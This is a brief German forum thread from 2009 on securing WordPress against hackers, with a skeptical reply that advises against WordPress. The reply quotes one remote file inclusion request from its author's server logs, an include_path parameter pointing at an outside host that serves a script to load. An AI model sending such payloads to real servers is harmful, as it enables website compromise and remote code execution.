Wordpress vor Angriffen schützen

Ein Frage die ich mir schon lange stelle ist: Wie sichert man Wordpress optimal vor Hackern ohne das die Usability eingeschränkt wird?

Ich habe schon viele Lösungen und Addons für die Sicherheit von WP gefunden doch das richtige war nicht dabei - wie schützt ihr euch vor Hackern und in wie weit ist WP schon vor diversen Angriffen gesichert?

Danke schon mal für die Antworten.

Schönes Osterfeiertage
Kevin Eichhorn
 
QUOTE (Kevin Eichhorn @ Sa 11.04.2009, 16:04)Wie sichert man Wordpress optimal vor Hackern ohne das die Usability eingeschränkt wird?


Kein WordPress verwenden.

Wenn Software schlecht konzipiert ist und es deshalb immer wieder Addons gibt, die Lücken aufweisen - dann nutzt da nicht allzuviel.



QUOTE (Kevin Eichhorn @ Sa 11.04.2009, 16:04)Ich habe schon viele Lösungen und Addons für die Sicherheit von WP gefunden doch das richtige war nicht dabei - wie schützt ihr euch vor Hackern und in wie weit ist WP schon vor diversen Angriffen gesichert?


Das hört sich für mich danach an, daß deine Site schon ein paar Mal gehackt worden ist.


Ich sehe ja, was bei mir ständig für Angriffsversuche (auf nicht vorhandene Software) reinkommen.

/en/admin/ST_platforms.php?include_path=http://gehackte.domain/rid.txt??

Mal ganze Scripts nachladen.
 
Zurück
Oben